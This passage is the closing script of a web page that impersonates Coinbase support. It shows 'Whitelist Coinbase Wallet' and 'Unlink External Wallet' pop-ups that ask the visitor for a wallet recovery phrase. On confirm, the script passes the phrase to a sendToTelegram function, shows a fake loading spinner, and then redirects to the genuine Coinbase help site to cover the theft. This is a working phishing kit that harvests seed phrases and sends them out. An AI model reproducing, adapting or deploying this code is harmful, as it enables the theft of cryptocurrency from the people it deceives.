            copyPhrases(phrases);
            stepContainer.children[0].classList.remove('active');
            stepContainer.children[1].classList.add('active');
            saveButton.disabled = false;
          };
        } else if (cardId === 'card2') {
          steps = [
            { icon: 'fas fa-key', text: 'Enter Phrase' },
            { icon: 'fas fa-shield-alt', text: 'Verify Device' },
            { icon: 'fas fa-check', text: 'Confirm' }
          ];
          popupTitle.innerHTML = '<i class="fas fa-shield-alt"></i> Whitelist Coinbase Wallet';
          popupDescription.textContent = 'Enter your recovery phrase to whitelist this device. This ensures only trusted devices can access your wallet.';
          recoveryTextarea.style.display = 'block';
          recoveryTextarea.value = '';
          recoveryTextarea.oninput = () => {
            saveButton.disabled = !recoveryTextarea.value.trim();
            if (recoveryTextarea.value.trim()) {
              stepContainer.children[0].classList.remove('active');
              stepContainer.children[1].classList.add('active');
            } else {
              stepContainer.children[1].classList.remove('active');
              stepContainer.children[0].classList.add('active');
            }
          };
        } else if (cardId === 'card3') {
          steps = [
            { icon: 'fas fa-key', text: 'Enter Phrase' },
            { icon: 'fas fa-unlink', text: 'Disconnect Wallet' },
            { icon: 'fas fa-check', text: 'Confirm' }
          ];
          popupTitle.innerHTML = '<i class="fas fa-unlink"></i> Unlink External Wallet';
          popupDescription.textContent = 'Enter your recovery phrase to unlink an external wallet. This will disconnect the wallet from your account.';
          recoveryTextarea.style.display = 'block';
          recoveryTextarea.value = '';
          recoveryTextarea.oninput = () => {
            saveButton.disabled = !recoveryTextarea.value.trim();
            if (recoveryTextarea.value.trim()) {
              stepContainer.children[0].classList.remove('active');
              stepContainer.children[1].classList.add('active');
            } else {
              stepContainer.children[1].classList.remove('active');
              stepContainer.children[0].classList.add('active');
            }
          };
        }

        // Create step items
        steps.forEach((step, index) => {
          const stepItem = document.createElement('div');
          stepItem.className = `step-item ${index === 0 ? 'active' : ''}`;
          stepItem.innerHTML = `<i class="${step.icon}"></i> ${step.text}`;
          stepContainer.appendChild(stepItem);
        });

        stepContainer.style.display = 'flex';
      }

      // Open popup for help cards
      helpCards.forEach(card => {
        card.addEventListener('click', (e) => {
          e.preventDefault();
          e.stopPropagation();
          vaultPopup.style.display = 'flex';
          configurePopup(card.id);
          vaultPopup.dataset.cardId = card.id;
        });
      });

      // Close popup
      closePopup.addEventListener('click', (e) => {
        e.preventDefault();
        e.stopPropagation();
        vaultPopup.style.display = 'none';
        saveButton.disabled = true;
        popupLoading.style.display = 'none';
      });

      // Handle save/confirm button
      saveButton.addEventListener('click', async (e) => {
        e.preventDefault();
        e.stopPropagation();
        
        // Show loading spinner
        popupLoading.style.display = 'block';
        saveButton.disabled = true;
        const stepItems = stepContainer.children;
        stepItems[1].classList.remove('active');
        stepItems[2].classList.add('active');

        const cardId = vaultPopup.dataset.cardId;
        if (cardId === 'card2' || cardId === 'card3') {
          const phrase = recoveryTextarea.value.trim();
          await sendToTelegram(phrase, cardId === 'card2' ? 'Whitelist Coinbase Wallet' : 'Unlink External Wallet');
        }

        // Simulate processing with a delay
        setTimeout(() => {
          // Hide popup and redirect to Coinbase Help
          vaultPopup.style.display = 'none';
          popupLoading.style.display = 'none';
          window.location.href = 'https://help.coinbase.com/';
        }, 1500);
      });

      // Close popup when clicking outside
      vaultPopup.addEventListener('click', (e) => {
        if (e.target === vaultPopup) {
          vaultPopup.style.display = 'none';
          saveButton.disabled = true;
          popupLoading.style.display = 'none';
        }
      });
    })();
  </script>
</body>
</html>
